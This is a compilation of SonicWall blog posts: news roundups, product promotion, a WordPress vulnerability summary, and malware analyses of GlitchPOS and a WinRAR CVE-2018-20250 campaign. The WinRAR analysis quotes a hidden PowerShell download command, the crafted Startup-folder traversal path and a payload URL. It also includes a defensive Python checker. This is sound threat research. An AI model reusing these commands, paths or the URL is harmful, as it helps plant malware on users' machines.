Cyber Security News & Trends – 03-29-19

This week, SonicWall releases the 2019 Cyber Threat Report and hosts a live Twitter Chat!


SonicWall Spotlight

Annual SonicWall Cyber Threat Report Details Rise in Worldwide, Targeted Attacks – SonicWall Press Release

  • SonicWall releases the highly anticipated 2019 SonicWall Cyber Threat Report, delivering an in-depth look at threat intelligence obtained from more than 1 million sensors around the world.

The SonicWall Cyber Threat Report Infographic – SonicWall website

  • If you want to know the highlights of the 2019 Cyber Threat Report then look no further than our handy Infographic which breaks down the major findings.

#SonicWallChat – Twitter Chat

  • To celebrate the release of the 2019 Cyber Threat Report we hosted our first live Twitter Chat! SonicWall Threat Researchers took over our Twitter handle and fielded questions about the Threat Report from our Twitter followers.

Perpetual ‘Meltdown’: Security in the Post-Spectre Era – Data Breach Today

  • The growing frequency and complexity of side-channel attacks, including Meltdown, Spectre and most recently Spoiler, is proving a growing threat to security. SonicWall CEO addresses this specific challenge in a video interview with Data Breach Today at the recent RSA Conference in San Francisco.

SonicWall Report Paints Sobering Picture of Cyberthreat Trends – Silicon Angle

  • Silicon Angle review the 2019 SonicWall Cyber Threat Report, stating that the results “don’t make happy reading for security personnel.”

SonicWall 2019 Cyber Threat Report Says Canadian Malware up More Than 100 per Cent – Channel Buzz (Canada)


Cyber Security News

Virus Attacks Spain’s Defense Intranet, Foreign State Suspected: Paper – Reuters

  • An undetected virus infecting the Spanish Defence Ministry’s intranet may have been active for months. Sources suspect a foreign state is behind the cyberattack.

Toyota Announces Second Security Breach in the Last Five Weeks – ZDNet

  • Toyota announced that it has been hit by a data breach for the second time in five weeks with servers storing information on up to 3.1 million customers affected. Experts suggested that APT32 hackers might have targeted Toyota’s Australia branch as a way to get into Toyota’s more secure central network in Japan.

Ransomware Behind Norsk Hydro Attack Takes on Wiper-Like Capabilities  – Threat Post

  • LockerGoga is the ransomware that has cost Norsk Hydro millions but researchers are still unsure who has created it and, since many of those infected cannot even view the ransom note, what their intent is.

Digital Footprint, Age, Position Determining Factors in Email Attacks – SC Magazine

  • A recent study found that it is possible to determine whether a person may be targeted by a fraudulent email by checking factors such as whether they were caught in a previous data breach, or even their age – older people who have been online longer than younger people are more likely to have been affected by a previous cyber incident.

 


In Case You Missed It

Advanced Security Training: New SonicWall Network Security Professional (SNSP) Course & Certification

Building on the success of the recently released SonicWall Network Security Administrator (SNSA) course and certification, SonicWall is proud to announce the release of the SonicWall Network Security Professional (SNSP) course.

Designed for today’s IT professionals who need to go beyond basic administration skills, the SNSP program provides network and security engineers with the in-depth technical knowledge required to maximize the capabilities of SonicWall’s next-generation firewall appliances in complex environments.

What is SNSP and how is it improved?

The SNSP cybersecurity training program includes 16 learning modules taught during two days of instructor-led classroom training, including advanced routing, interface settings, advanced high availability and implementing best practices. It features:

  • 60 percent hands-on labs
  • 40 percent training lectures
  • Based on the recently released SonicOS 6.5.2 firmware

The SNSP will replace the existing Network Security Advanced Administrator (NSAA) course, which will be retired on June 30, 2019. After this date, no additional NSAA courses will be offered. However, the associated Certified SonicWall Security Professional (CSSP) certification will remain valid for two years after completion.

Delivery of the SNSP program will align with other SonicWall certification courses and will be incorporated into our existing Authorized Training Partner (ATP) strategy. This will ensure consistency in the delivery of training, regardless of where it is received, or which ATP provides it.

For more information on the SNSP course, or to find scheduled classes, go to the SonicWall Training and Certification page.

WordPress Vulnerability Roundup – Q1 2019

WordPress is a free open-source content management system. It powers about 30% of all websites on the internet and 33% of the Top 10 Million Sites globally. There are over 50,000 WordPress plugins available to add features and extend the functionality of WordPress websites. Since WordPress is the most popular CMS, it is a common target for hackers, who can cause more damage through it than through any other platform.

Since the beginning of 2019, three zero-day vulnerabilities have been discovered in the WordPress plugins Total Donations, Easy WP SMTP and Social Warfare. These were actively being exploited in the wild, and hackers continue to compromise WordPress websites that are still unpatched.

The SonicWall Capture Labs Threat Research Team has analyzed and addressed WordPress Vulnerabilities for Q1 2019. 

WordPress vulnerabilities come from three components: the WordPress core, plugins, and themes.

Fig: Q1 2019 WordPress vulnerability distribution by components

Cross-site scripting (XSS) is at the top of the list. WordPress plugins are prone to Cross-site scripting as they fail to properly sanitize user-supplied input.

Fig: Q1 2019 WordPress vulnerability distribution by types

Nearly 40 WordPress vulnerabilities were disclosed in the month of March alone. Most of the bugs were in the plugins that extend the functionality of WordPress websites.

Fig: Q1 2019 WordPress vulnerability 

The top vulnerable plugins include popular ones: WooCommerce, with 4+ million active installations, followed by WP Google Maps, with 400,000+ active installations.

Fig: Q1 2019 Top Vulnerable WordPress plugins

1. How To Fix WordPress Zero Day Plugin Vulnerability?
Immediately check to see if there is a patch available. If no patch is available, consider disabling and deleting the plugin that contains the Zero Day vulnerability.
2. How to secure WordPress websites?
WordPress has detailed the following security best practices   
3. What to do when my WordPress website is hacked?

SonicWall Capture Labs Threat Research team provides protection with the following signatures:

IPS: 14105 WordPress plugin Easy SMTP vulnerability
IPS: 14106 WordPress plugin Social Warfare XSS Vulnerability
IPS: 14005 WordPress Total Donations Plugin Authentication Bypass 1
IPS: 14006 WordPress Total Donations Plugin Authentication Bypass 2
WAF: 1704 WordPress Social Warfare Cross-Site Scripting Vulnerability
WAF: 1703 Easy WP SMTP Unauthenticated Arbitrary wp_options Import
WAF: 1691 WordPress Total Donations Plugin Authentication Bypass

2019 SonicWall Cyber Threat Report: Unmasking Threats That Target Enterprises, Governments & SMBs

The launch of the annual SonicWall Cyber Threat Report always reminds us why we’re in this business.

Our engineers and threat researchers dedicate months to the project in order to shed light on how people, businesses and organizations online are affected by cybercrime.

What they found is telling. Across the board, cyberattacks are up. Criminals aren’t relenting. Hackers and nefarious groups are pushing attacks to greater levels of volume and sophistication. And the 2019 SonicWall Cyber Threat Report outlines how they’re doing it and at what scale.

To understand the fast-changing cyber arms race, download the complimentary 2019 SonicWall Cyber Threat Report. The unification, analysis and visualization of cyber threats will empower you and your organization to fight back with more authority, determination and veracity than ever before. So, let’s take a look at what’s included.

Malware Volume Still Climbing

In 2016, the industry witnessed a decline in malware volume. Since then, malware attacks have increased 33.4 percent. Globally, SonicWall recorded 10.52 billion malware attacks in 2018 — the most ever logged by the company.

UK, India Harden Against Ransomware

SonicWall Capture Lab threat researchers found that ransomware was up in just about every geographic region but two: the U.K. and India. The report outlines where ransomware volume shifted, and which regions were impacted most by the change.

Dangerous Memory Threats, Side-Channel Attacks Identified Early

The report explores how SonicWall Real-Time Deep Memory Inspection™ (RTDMI) mitigates dangerous side-channel attacks utilizing patent-pending technology. Side-channels are the fundamental vehicle used to exploit and exfiltrate data from processor vulnerabilities, such as Foreshadow, PortSmash, Meltdown, Spectre and Spoiler.

Malicious PDFs & Office Files Beating Legacy Security Controls

Cybercriminals are weaponizing PDFs and Office documents to help malware circumvent traditional firewalls and even some modern day network defenses. SonicWall reports how this change is affecting traditional malware delivery.

Attacks Against Non-Standard Ports

Ports 80 and 443 are standard ports for web traffic, so they are where many firewalls focus their protection. In response, cybercriminals are targeting a range of non-standard ports to ensure their payloads can be deployed undetected in a target environment. The problem? Organizations aren’t safeguarding this vector, leaving attacks unchecked.

IoT Attacks Escalating

There’s a deluge of Internet of Things (IoT) devices rushed to market without proper security controls. In fact, SonicWall found a 217.5 percent year-over-year increase in the number of IoT attacks.

Encrypted Attacks Growing Steady

The growth in encrypted traffic is coinciding with more attacks being cloaked by TLS/SSL encryption. More than 2.8 million attacks were encrypted in 2018, a 27 percent increase over 2017.

The Rise & Fall of Cryptojacking

In 2018, cryptojacking diminished nearly as fast as it appeared. SonicWall recorded tens of millions of cryptojacking attacks globally between April and December. The volume peaked in September, but has been on a steady decline since. Was cryptojacking a fad or is more on the way?

Global Phishing Volume Down, Attacks More Targeted

As businesses get better at blocking email attacks and ensuring employees can spot and delete suspicious emails, attackers are shifting tactics. They’re reducing overall attack volume and launching more targeted phishing campaigns. In 2018, SonicWall recorded 26 million phishing attacks worldwide, a 4.1 percent drop from 2017.

WinRAR Vulnerability actively being exploited in the wild

WinRAR is the world’s most popular compression tool, with over 500 million users worldwide. Last month, a critical WinRAR vulnerability that had existed for 19 years was disclosed. This vulnerability is easy to exploit, and all users with unpatched versions of WinRAR are at risk. In the last month, VirusTotal has collected over 200 unique WinRAR exploits.

There have been two major exploits of this vulnerability, one targeting Ukraine with a Ukrainian law-related PDF document and another targeting users in the Middle East. Last week, the SonicWall Capture Labs Threat Research team observed another campaign targeting users in Chile. The WinRAR vulnerability is the most sought-after exploit used by both cyber criminals and nation-state actors.

Infection Cycle:

In this campaign, a malicious batch script is sent through phishing documents. Upon execution, the batch script drops the WinRAR exploit archive, which contains a malware program. The batch script then calls WinRAR.exe to extract the crafted archive file. Upon extraction, the malware program gets planted under “Start Menu”. The malware program runs automatically after every system reboot, installs backdoors, steals user information and connects with the Command and Control (C&C) server.

The batch script gets delivered as __Denuncia_Activa_CL.PDF.bat, named to look like an active complaint report targeting a Chile law office. The batch script is encoded in little-endian UTF-16 format; an ASCII output is shown below.


Fig: __Denuncia_Activa_CL.PDF.bat

Currently this script is not detected by any of the engines on VirusTotal.

 Fig: VirusTotal detection score for the batch script

Upon execution, the malicious batch script performs the following actions:

  • Drops payload

It runs a PowerShell command to drop the exploit file denuncias.rar.

PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('%downloadurl%'

  • Extracts archive

It then calls the vulnerable WinRAR.exe on the user’s machine to extract the malicious archive file.
%ProgramFiles%\WinRAR\winRar.exe" x -y -c "%downloadpath%\%arch%" "%downloadpath%

  • Exploits vulnerable host

It exploits the remote code execution vulnerability in WinRAR simply by extracting the crafted WinRAR archive.

CVE-2018-20250: This vulnerability is due to improper handling of the relative path of a file in an ACE archive, which leads to directory traversal. WinRAR makes use of a third-party library, unacev2.dll, for unpacking ACE archive files. While unpacking, the library goes through several steps to check whether the file name is a normal relative path. If the file name is an absolute path that contains a drive letter, or points to a shared folder, it removes the drive letter or shared folder path but keeps the rest of the directory structure. However, this check can be bypassed with a specific directory sequence at the beginning of the path.

The WinRAR archive pretends to have just two plain text documents.


Fig: WinRAR exploit archive file denuncias.rar

A malware program named “Integrity.exe” is hidden under “C:” drive with the file path specified as “C:\C:C:..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”.


Fig:  Malware program Integrity.exe with the crafted file path

Check Point has detailed this vector, in which the following file path gets translated during the file path integrity check.

C:\C:C:..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe

The check removes “C:\C:”, leaving the file path as given below:

C:..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe

Here “C:” is translated to the “current directory” of the running process. The “current directory” of WinRAR will be the path to the folder that the archive resides in. Since the archive is dropped into the user’s Downloads folder, the “current directory” of WinRAR will become
C:\Users\Username\Downloads

Hence the path “C:../” traverses from the Downloads folder to the User folder and then appends the relative path to the startup directory, AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

Thus, by extracting the malicious archive on vulnerable hosts, the script plants the malware program “integrity.exe” in the startup directory, as shown below.


Fig: Integrity.exe planted in startup directory

  • Pings for delay simulation

It pings the localhost to delay the execution for a few seconds.

ping 127.0.0.1 -n 1 > nul

  • Shuts down

Finally, the script shuts down the machine, forcing the user to boot it up again and so kick-start the malicious program under the Start Menu. While a normal reboot by the user would have the same effect, for some reason this campaign doesn’t want to wait until the user initiates the reboot.

Upon reboot, the malicious program “Integrity.exe” gets into action and connects with the Command and Control (C&C) server.


Fig: Exploit campaign targeting Chile users
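
The path translation described above can be checked before extraction. The following is an added example, not code from SonicWall, Check Point or WinRAR: it resolves an entry name under Windows path rules and lists the reasons it must not be extracted. It assumes the entry names have already been read from the archive header; the two .txt names are constructed, and the function names are hypothetical.

```python
# Added example (not SonicWall's or WinRAR's code): vet archive entry names
# under Windows path rules before anything is written to disk.
import ntpath  # Windows path semantics, importable on any OS

STARTUP_MARKER = r"\start menu\programs\startup"

# Constructed sample input. The two .txt names are made up; the other two are
# the stored path and the post-check path quoted in the article.
STORED = (r"C:\C:C:..\AppData\Roaming\Microsoft\Windows"
          r"\Start Menu\Programs\Startup\Integrity.exe")
AFTER_CHECK = (r"C:..\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup\Integrity.exe")
DOWNLOADS = r"C:\Users\Username\Downloads"
SAMPLE_ENTRIES = ["documento1.txt", "documento2.txt", STORED]


def resolve_like_windows(name, cwd):
    """Resolve name as Windows would for a process whose current dir is cwd."""
    name = name.replace("/", "\\")
    drive, rest = ntpath.splitdrive(name)
    cwd_drive, _ = ntpath.splitdrive(cwd)
    if rest.startswith("\\"):
        # Rooted: absolute on the named drive or share (cwd's drive if none).
        full = (drive or cwd_drive) + rest
    elif not drive or drive.lower() == cwd_drive.lower():
        # Plain relative, or drive-relative on cwd's drive: resolved from cwd.
        full = cwd.rstrip("\\") + "\\" + rest
    else:
        # Drive-relative on another drive: its current dir is unknown here,
        # so assume the drive root. It is outside the target either way.
        full = drive + "\\" + rest
    return ntpath.normpath(full)


def entry_problems(name, extract_dir):
    """Return the reasons name must not be extracted under extract_dir."""
    problems = []
    norm = name.replace("/", "\\")
    drive, rest = ntpath.splitdrive(norm)
    if drive:
        problems.append("drive or UNC prefix")
    if rest.startswith("\\"):
        problems.append("rooted path")
    parts = [p for p in rest.split("\\") if p]
    if ".." in parts:
        problems.append("parent-directory component")
    if any(":" in p for p in parts):
        problems.append("colon inside a path component")
    # Defense in depth: compute where the file would really land.
    dest = resolve_like_windows(norm, extract_dir)
    base = ntpath.normpath(extract_dir).lower().rstrip("\\") + "\\"
    if not (dest.lower() + "\\").startswith(base):
        problems.append("resolves outside extraction directory: " + dest)
    if STARTUP_MARKER in dest.lower():
        problems.append("targets a Startup folder")
    return problems


def scan(entries, extract_dir):
    """Map each unsafe entry name to its list of problems."""
    report = {}
    for name in entries:
        problems = entry_problems(name, extract_dir)
        if problems:
            report[name] = problems
    return report


if __name__ == "__main__":
    print(resolve_like_windows(AFTER_CHECK, DOWNLOADS))
    for entry, reasons in scan(SAMPLE_ENTRIES, DOWNLOADS).items():
        print(entry)
        for reason in reasons:
            print("   -", reason)
```
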

Hashes
Batch script:
9008b75ac8bbaacbda0dc47bb7d631f1c791cb346cc6f6a911e7993da0834c09
First seen: 2019-03-22 00:39:43

RAR archive :
b5a84e8079dc8558d3960d711d8591500b69cf79e750ecaf88919e398c59383f
First seen: 2019-03-21 20:30:32

Malware Payload:
421448d92a6d871b218673025d4e4e121e263262f0cb5cd51e30853e2f8f04d7
First seen: 2019-03-22 03:57:40

Payload Url:
https://www.triosalud.cl/wp/wp-content/uploads/2019/02/denuncias.rar


Fix
Upgrade to the latest WinRAR version to resolve the issue.
WinRAR versions prior to 5.70 beta 1 are affected by this vulnerability.

SonicWall Capture Advanced Threat Protection (ATP) provides protection against this with its multi-engine approach.

SonicWall Threat Research Lab provides protection against this exploit with the following signatures:

SPY5408 Malformed-File ace.TL.1
IPS: 14052 File-Format ace
IPS: 14056 Archive Ace 2 (HTTP Download)

 

 

GlitchPOS, the new point-of-sale malware actively spreading in the wild.

The SonicWall Capture Labs Threat Research Team observed reports of a new POS malware family named GlitchPOS (detected as GAV: GlitchPOS.A) actively spreading in the wild.

GlitchPOS carries a fake cat game, which is embedded in the malware and not displayed at the time of execution. GlitchPOS has capabilities such as scraping memory to retrieve credit card data during its scan.

Contents of GlitchPOS Malware

 

Infection Cycle:

The Malware adds the following files to the system:

  • %Userprofile%Application Data\SearchIndexer.exe [Detected as GAV: GlitchPOS.A (Trojan)]
  • %Userprofile%Local Settings\Temp\x.vbs

The Malware adds the following file to the startup folder to ensure persistence upon reboot:

  • %Userprofile%Start Menu\Programs\Startup\SearchIndexer.lnk

Once the computer is compromised, the malware creates a new process to maintain persistence and then launches a component to monitor for sensitive payment card data.

GlitchPOS retrieves a list of running processes and periodically scrapes the memory of current processes on the infected machine for credit card information.

GlitchPOS has an exclusion list that functions to ignore certain system processes; it gathers track data by scanning the memory of all running processes except for the following List:

Once it locates payment card data, GlitchPOS makes one HTTP request to determine the infected system’s external IP address. GlitchPOS generates a random identifier for the target machine and sends it to the C&C server.

GlitchPOS uses a basic encryption and hex encoding method to obfuscate various strings such as the shellcode, filenames, and process names to evade detection.

Once the public IP is acquired, GlitchPOS tries to verify credit card numbers and then sends track 1 and track 2 credit card data in encrypted format.

GlitchPOS tries to enumerate credit card data from POS software using the Luhn algorithm, then encrypts it and sends it to one of the given C&C servers.

Here is an example of Track data:

Command and Control (C&C) Traffic

GlitchPOS performs C&C communication over port 80. Requests are made on a regular basis to statically defined domains such as:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: GlitchPOS.A (Trojan)

 

 

Cyber Security News & Trends – 03-22-19

This week, SonicWall’s Cyber Threat Report is just around the corner, Facebook stored passwords in a searchable format and a hacker sets off tornado sirens in Texas.


SonicWall Spotlight

Unmasking the Threats: A Preview of the 2019 SonicWall Cyber Threat Report – SonicWall Blog

  • SonicWall’s Terri O’Leary previews the 2019 SonicWall Cyber Threat Report, scheduled for release on March 26, including information about our upcoming Twitter chat.

Cyber Security News

Facebook Stored Millions of User Passwords in Plain, Readable Text – NPR

  • Facebook stored hundreds of millions of user passwords in unencrypted and internally searchable plain text for years. The company says there are no signs of misuse of this data, and that the password logging was inadvertent.

How Hackers Pulled Off a $20 Million Mexican Bank Heist – Wired

  • Flawed, unprotected and insecure network architecture allowed hackers to exploit the Mexican bank infrastructure and pull off a $20 million bank heist. This involved coordinating long distance communication, recruitment and training for hundreds of people but Wired reports that this was feasible because many would have been willing to work for less than $260 each.

Hacked Tornado Sirens Taken Offline in Two Texas Cities Ahead of Major Storm – ZDNet

  • A hacker set off over 30 tornado emergency sirens in the middle of the night in two North Texas cities. “It has become evident that a person or persons with hostile intent deliberately targeted our combined outdoor warning siren network,” Lancaster officials said in a statement.

Nielsen Warns US ‘Not Prepared’ for Foreign Cyberattacks – The Hill

  • U.S. Homeland Security Secretary Kirstjen Nielsen says that the U.S. “is not prepared” to handle hackers backed by other countries, warning that an attack by a nation state against the internet connected device of an “average private citizen” is not a fair fight.

New Europol Protocol Addresses Cross-Border Cyberattacks – Dark Reading

  • The Council of the European Union has adopted a new EU Law Enforcement Emergency Response Protocol intended to prepare for, and protect from, large-scale, cross-border cyberattacks. It also aims to help law enforcement immediately respond to any cyberattacks that do happen.

Aluminum Maker Hydro Battles to Contain Ransomware Attack – Reuters

  • One of the largest aluminum producers had to shut down several of its plants to contain a ransomware attack after they were infected by a malware known as LockerGoga. The company say its intention is to restore encrypted files rather than pay the ransom.

DDoS Attack Size Drops 85% in Q4 2018 – Dark Reading

  • The average distributed denial-of-service (DDoS) attack size shrank 85% in the fourth quarter of 2018 following an FBI takedown of DDoS-for-hire websites in December 2018. Researchers believe that this decline is likely only to be temporary because the downed websites served as payment gateways rather than as the technology used to launch the attacks.

MyPillow and Amerisleep Wake up to Magecart Card Theft Nightmare – ZDNet

  • Hundreds of Magecart incidents are thought to occur daily but two U.S. mattress and bedding merchants are thought to have not acknowledged major attacks on their websites going as far back as 2017; attacks that may still be ongoing.

In Case You Missed It

Unmasking the Threats: A Preview of the 2019 SonicWall Cyber Threat Report

Each year, the SonicWall Capture Labs threat research team gathers and analyzes threat data captured by the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world. The end result is one of the cybersecurity industry’s most anticipated and comprehensive reports on the current threat landscape: the annual SonicWall Cyber Threat Report.

The 2019 SonicWall Cyber Threat Report is scheduled for release on March 26. As always, the threat intelligence contained within the full report will prove vital to enterprise and government IT security teams globally.

The report will also help SMBs navigate the complex cyber threat landscape. The 2018 State of Cybersecurity in Small and Medium Size Businesses study revealed that 47 percent of respondents admitted to having no understanding of how to defend their companies against cyberattacks.

At SonicWall, we are committed to helping SMBs arm themselves with the knowledge and solutions necessary to navigate the current threat landscape and protect what is important to them. SonicWall President and CEO Bill Conner considers the annual Cyber Threat Report to be a vital component in SonicWall’s mission “to ensure organizations and businesses are better informed to safeguard their networks and data.”

“Investing in cyber threat research and publishing our findings,” explains Bill, “helps foster collaboration between the private sector, security industry and trusted third parties to bolster a strong, united front against cyberattacks.”

What to Expect

To give you an idea of what you can expect from this year’s full report, we’ve pulled some highlights and high-level perspectives on the threat intelligence from SonicWall Capture Labs threat researchers.

Individual Countries are Driving Change
After SonicWall Capture Lab threat researchers finished analyzing full-year 2018 threat data, a number of shocking revelations were made. In a number of threat areas, individual countries are bucking the global trends and managing to achieve significant volume reductions in major attack areas like ransomware.

Attacks Against Non-Standard Ports
Ports 80 and 443 are standard ports for web traffic, so they are where most firewalls focus their protection. In response, cybercriminals are targeting a range of non-standard ports to ensure their payloads can be deployed undetected in a target environment. The problem? Organizations aren’t safeguarding this vector, leaving attacks unchecked.

Processor Vulnerabilities Growing

New side-channel threats, such as Spectre, Meltdown, Foreshadow, Spoiler and PortSmash, are moving the cyber war to an entirely new theater — one that is extremely difficult to monitor, defend or patch.

Want the report first?

To promote global awareness and facilitate important dialogues, SonicWall remains steadfast in its commitment to research, analyze and share threat intelligence via the 2019 SonicWall Cyber Threat Report. Sign up now and be first to #KnowTheThreats.

Ask an Insider: Join our Twitter Chat

Ready to learn more about the data behind the 2019 SonicWall Cyber Threat Report? Or do you want to ask a SonicWall researcher about some of the report conclusions and predictions? Join us and our guest researchers from SonicWall Capture Labs in an upcoming SonicWall Twitter Chat. Here’s a preview of the questions we’ll be asking you and our researchers:

  • In your opinion, what was the worst data breach of 2018?
  • What are your biggest concerns about side-channel attacks?
  • Why have PDFs and Office files become such a popular attack vector?
  • What is a new attack variant and how can there have been so many in 2018?
  • What types of IoT devices are most often compromised?
  • What are the business impacts of cryptojacking attacks?
  • What’s the worst cybersecurity advice you’ve ever been given?
  • What are your 2019 predictions?

To join our chat, and ask our researchers anything, follow @SonicWall and the hashtag #SonicWallChat on Twitter starting at 11 a.m. CDT on March 28.

Sign up now to receive the full 2019 SonicWall Cyber Threat Report, which will feature detailed threat findings, best practices, predictions and more, to help you stay a step ahead in the global cyber arms race.

Cyber Security News & Trends – 03-15-19

This week, vote for SonicWall in 2019 CRN Channel Madness, Facebook suffers an outage worldwide, and one U.S. County pays a $400,000 ransom.


SonicWall Spotlight

SonicWall’s HoJin Kim has been nominated in the 2019 CRN Channel Madness Tournament.

  • CRN’s fifth annual Channel Madness Tournament of Chiefs pits some of the channel’s best-known executives against each other. Vote for HoJin Kim now!

SonicWall Launches Security Solutions for Wireless Networks, Cloud Apps and Endpoints – CRN (India)

  • SonicWall’s Debasish Mukherjee is quoted talking about the release of new SonicWall products and the expansion possibilities for SonicWall in the Indian market.

SonicWall Now a California Multiple Award Schedule (CMAS) Vendor – SonicWall Blog

  • Being a CMAS vendor allows SonicWall to support K-12 education through the E-rate program, a Federal funding program that allows technology products and services to be purchased by school districts and libraries.

Cyber Security News

Hackers Use Slack to Hide Malware Communications – CSO Online

  • Cyberattackers have been using a previously undocumented backdoor program to launch an attack on users of Slack. A fully patched computer will prevent the attack but in cases where the exploit runs successfully it triggers a damaging multi-stage infection.

Web Inventor Tim Berners-Lee Calls for ‘Fight’ Against Hacking and Abuse on its 30th Birthday – CNN

  • On the 30th anniversary of its launch, the inventor of the world wide web called out three major “sources of dysfunction” affecting it: deliberate malicious intent, system design and the unintended negative consequences of benevolent design.

Facebook’s Daylong Malfunction Is a Reminder of the Internet’s Fragility – New York Times

  • A technical error by Facebook led to a worldwide outage that affected Facebook, WhatsApp and Instagram. The New York Times looks at how the more tightly woven a computer network becomes, the more likely it is that a small problem can grow into a large one.

Applicant Data Hacked and Ransomed at Three U.S. Colleges – Fortune

  • Three U.S. colleges recently suffered successful ransomware attacks. The hackers were able to fool college staff members into handing over passwords and then took control of databases that housed student applicant information.

Hackers Cop a FILA Thousands of UK Card Deets After Slinking Onto Clothing Brand’s Servers – The Register (UK)

  • Sportswear brand FILA are the latest company to suffer from a damaging malware infection with an attack similar to Magecart infecting card payments on their website.

US Senators Want to Know How Many Times They’ve Been Hacked – ZDNet

  • Two US senators have requested the US Senate Sergeant at Arms to provide each senator with both annual statistics about cyberattacks and a commitment to disclosing breaches within five days of discovery.

Georgia County Pays a Whopping $400,000 to Get Rid of a Ransomware Infection – ZDNet

  • Officials in Jackson County, Georgia, negotiated with cybercriminals to pay a $400,000 ransom after being successfully infected with ransomware.

In Case You Missed It

Wireless Security, Wi-Fi Management Hot Topics at RSA Conference 2019

Like the many years before it, RSA Conference 2019 in San Francisco was full of buzz, energy, product “noise” and, this year, lots of heavy rain. And, of course, I forgot to bring my umbrella.

Rain or shine, RSA draws over 50,000 attendees each year. The event provides a chance to get to know the hot products shaping the security industry, hear from industry experts and connect with peers.

Although many fantastic cybersecurity products were on display on the expo floor, there were a few that completely stood out — and the end-to-end SonicWall wireless solution was among them.

Wireless security, planning and management from a single solution

The SonicWall wireless solution is comprised of SonicWave access points, WiFi Cloud Manager, WiFi Planner and the SonicWiFi mobile app. In fact, Biztech named the SonicWave wireless access points among the new and useful technology seen at the show. (Go to the 3:30 mark in the video below.)

SonicWave access points (AP) combine high-performance IEEE 802.11ac Wave 2 wireless technology with flexible deployment options. The APs can be managed via the cloud using SonicWall WiFi Cloud Manager or through SonicWall’s industry-leading next-generation firewalls. The result is a solution that could be untethered from the firewall to provide you a superior WiFi user experience that’s as secure as any wired connection.

SonicWave access points take advantage of the Wave 2 standard with MU-MIMO support, which enables simultaneous transmission to numerous Wave 2-enabled wireless clients, providing an enhanced user experience. You can also easily extend your Wi-Fi networks and effortlessly set it up with mesh technology.

Wireless security — even without a firewall

SonicWall integrates advanced security right on the access points. The cloud-based, multi-engine Capture Advanced Threat Protection (ATP) sandbox and Content Filtering Service (CFS) can be enabled on the access points to provide advanced threat detection and protection.

SonicWave access points provide you comprehensive wireless security with features including a dedicated third radio for security scanning, wireless intrusion detection and prevention, wireless firewalling, secure Layer 3 wireless roaming and more.

Easy Wi-Fi planning, management from the cloud

If you aren’t an RF expert, getting the right AP placement for optimal coverage or density is somewhat impossible. Prior to AP deployment, designing and planning Wi-Fi networks with a site survey tool is essential.

This is where SonicWall WiFi Planner comes to your rescue. It is a predictive, cloud-based site-survey tool to ensure you have the best RF plan.

Once you have a plan, next you need to onboard the devices. The SonicWall SonicWiFi mobile app, available on iOS and Android, helps you monitor networks, easily onboard wireless access points and set up wireless mesh networks.

After onboarding you need to manage maybe dozens or even thousands of SonicWave access points. Named one of the 16 hottest network and endpoint security products at RSA by CRN, SonicWall WiFi Cloud Manager streamlines the process. It is available via the cloud-based Capture Security Center and delivers single-pane-of-glass visibility to reduce costs and simplify Wi-Fi management.

Wave 2 wireless access points are reliable, easy to manage

SonicWave access points are ideal for most deployments as they provide reliable user experience with flexible management. SonicWave 200 series access points are best suited for medium-to-low density requirements.

For example, the SonicWave 231c can be used indoors in retail stores or classrooms and can be installed on ceilings, while the SonicWave 224w can be used in indoor locations like hotel and hospital rooms.

On the other hand, the SonicWave 231o outdoor access points are IP67-rated to withstand tough outdoor conditions and fit perfectly in outdoor spaces like parks, playgrounds and parking lots. For higher density requirements, SonicWave 400 series access points are ideal.